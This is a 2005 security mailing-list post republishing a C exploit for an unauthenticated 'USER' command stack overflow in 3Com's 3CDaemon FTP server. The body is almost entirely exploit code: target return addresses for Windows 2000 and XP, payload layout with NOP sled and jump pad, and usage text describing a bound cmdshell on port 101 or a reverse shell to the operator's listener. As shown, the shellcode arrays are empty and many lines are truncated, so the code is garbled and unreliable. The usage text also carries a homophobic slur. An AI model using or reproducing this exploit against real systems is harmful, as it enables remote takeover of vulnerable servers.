[EXPL] 3com 3CDaemon FTP Unauthorized "USER" Buffer Overflow (Windows/POSIX)
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 21 Feb 2005 11:05:28 +0200
Subject: [EXPL] 3com 3CDaemon FTP Unauthorized "USER" Buffer Overflow (Windows/POSIX)
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3com 3CDaemon FTP Unauthorized "USER" Buffer Overflow (Windows/POSIX)
3Com FTP Server has been found to contain a remotely exploitable buffer
overflow in its parsing of the 'USER' command. The following exploit code
can be used to test your system for the mentioned vulnerability.
3com 3CDaemon FTP Unauthorized "USER" Remote BOverflow
The particularity of this exploit is to exploits a FTP server
without the need of any authorization.
Homepage: www.3com.com
version: 3CDaemon v2.0 rev10
Link: ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip
Application Risk: Severely High
Internet Risk: Low
Hole History:
14-4-2002: BOF flaw found by skyrim
15-4-2002: crash exploit done. securiteam.com/exploits/5NP050A75A.html
04-1-2005: Updated advisory by Sowhat securitytracker.com/id?1012768
17-2-2005: exploit released milw0rm.com/id.php?id=825
18-2-2005: exploit released hat-squad.com, class101.org,
-4 bad bytes, 0x00, 0x25, 0x0D, 0x0A, badly interpreted by 3CDaemon
-Nice call ebx offset found.
Stable accross Win2k Pro&Srv, SP4's serie, POSIX.
Nima Majidi
Behrang Fouladi
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
char scode1[]=
char scode2[]=
char payload[1024];
char ebx[]="\x08\xB0\x01\x78";
char ebx2[]="\xB1\x2C\xC2\x77";
char pad[]="\xEB\x0C\x90\x90";
char EOL[]="\x0D\x0A";
#ifdef WIN32
WSADATA wsadata;
void ver();
void usage(char* us);
int main(int argc,char *argv[])
unsigned long gip;
unsigned short gport;
char *target, *os;
if (argc > 6 || argc 2 || atoi (argv [1]) < 1) {usage (argv [0]); return
if (argc == 5){usage (argv [0]); return -1;}
if (strlen (argv [2]) < 7){usage (argv [0]); return -1;}
if (argc == 6)
if (strlen (argv [4]) < 7){ usage (argv [0]); return -1;}
#ifndef WIN32
if (argc == 6)
gip = inet_addr (argv [4]) ^ (long) 0x93939393;
gport=htons (atoi (argv [5])) ^ (short) 0x9393;
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
if (WSAStartup (MAKEWORD (2, 0), &wsadata) != 0){ printf ("[+] wsastartup
error\n"); return -1;}
if (argc==6)
gip = inet_addr (argv [4]) ^ (ULONG) 0x93939393;
gport=htons (atoi (argv [5])) ^ (USHORT) 0x9393;
int ip= htonl (inet_addr (argv [2])), port;
if (argc == 4 || argc == 6) {port = atoi (argv [3]);} else port = 21;
SOCKET s; fd_set mask; struct timeval timeout; struct sockaddr_in server;
s = socket(AF_INET, SOCK_STREAM, 0);
if (s == -1) {printf ("[+] socket() error\n"); return -1;}
if (atoi (argv [1]) == 1) {target = ebx;os = "Win2k SP4 Server
English\n[+] Win2k SP4 Pro. English\n[+] Win2k SP4 Pro. Norsk\n[+] Win2k
SP4 Server German\n[+] Win2k SP4 Pro. Dutch\n[+] Etc...";}
if (atoi (argv [1]) == 2){target = ebx2; os = "WinXP SP2 Pro. English\n[+]
WinXP SP1a Pro. English\n[+] WinXP SP1 Pro. English";}
printf ("[+] target(s): %s\n", os);
server.sin_family = AF_INET;
server.sin_addr.s_addr = htonl (ip);
server.sin_port = htons (port);
connect (s, (struct sockaddr *) & server,sizeof (server));
timeout.tv_sec = 3; timeout.tv_usec = 0; FD_ZERO (&mask); FD_SET (s,
switch (select (s+1, NULL, &mask, NULL, &timeout))
case -1: { printf ("[+] select() error\n"); closesocket(s); return -1;}
case 0: { printf("[+] connect() error\n"); closesocket(s); return -1;}
if (FD_ISSET (s, &mask))
printf ("[+] connected, constructing the payload...\n");
#ifdef WIN32
Sleep (1000);
Sleep (1);
strcpy (payload, "USER ");
memset (payload + 5, 0x90, 700);
memcpy (payload + 5 + 229, &pad, 4);
memcpy (payload + 238, target, 4);
if (argc == 6)
memcpy (&scode1 [5], &gip, 4);
memcpy(&scode1 [3], &gport, 2);
memcpy(payload + 253, scode1, sizeof (scode1));
else memcpy (payload + 253, scode2,sizeof (scode2));
strcat (payload, EOL);
if (send (s, payload, strlen (payload), 0) == -1) { printf("[+] sending
error 1, the server prolly rebooted.\n"); return -1;}
#ifdef WIN32
Sleep (2000);
Sleep (2);
printf ("[+] size of payload: %d\n",strlen(payload));
printf ("[+] payload sent.\n");
return 0;
closesocket (s);
#ifdef WIN32
return 0;
void usage(char* us)
printf ("USAGE:\n");
printf (" [+] . 101_3com.exe Target VulnIP (bind mode)\n");
printf (" [+] . 101_3com.exe Target VulnIP VulnPORT (bind mode)\n");
printf (" [+] . 101_3com.exe Target VulnIP VulnPORT GayIP GayPORT (reverse
printf ("TARGET: \n");
printf (" [+] 1. Win2k SP4 Server English (*)\n");
printf (" [+] 1. Win2k SP4 Pro English (*)\n");
printf (" [+] 1. Win2k SP4 Server German (*)\n");
printf (" [+] 1. Win2k SP4 Pro China (*)\n");
printf (" [+] 1. Win2k SP4 Pro Dutch (*)\n");
printf (" [+] 1. Win2k SP4 Pro Norsk (*)\n");
printf (" [+] 2. WinXP SP2 Pro. English \n");
printf (" [+] 2. WinXP SP1a Pro. English (*)\n");
printf (" [+] 2. WinXP SP1 Pro. English \n");
printf ("NOTE: \n");
printf (" The exploit bind a cmdshell port 101 or\n");
printf (" reverse a cmdshell on your listener.\n");
printf (" A wildcard (*) mean tested working, else, supposed working.\n");
printf (" Compilation msvc6, cygwin, Linux.\n");
void ver()
printf(" \n");
printf(" ================3COM 3CDaemon v2.0 Revision
printf(" ==============FTP Service, Remote Stack
printf(" ======coded by class101=============[Hat-Squad.com
printf(" \n");
The information has been provided by <mailto:class101@hat-squad.com.>
class 101.
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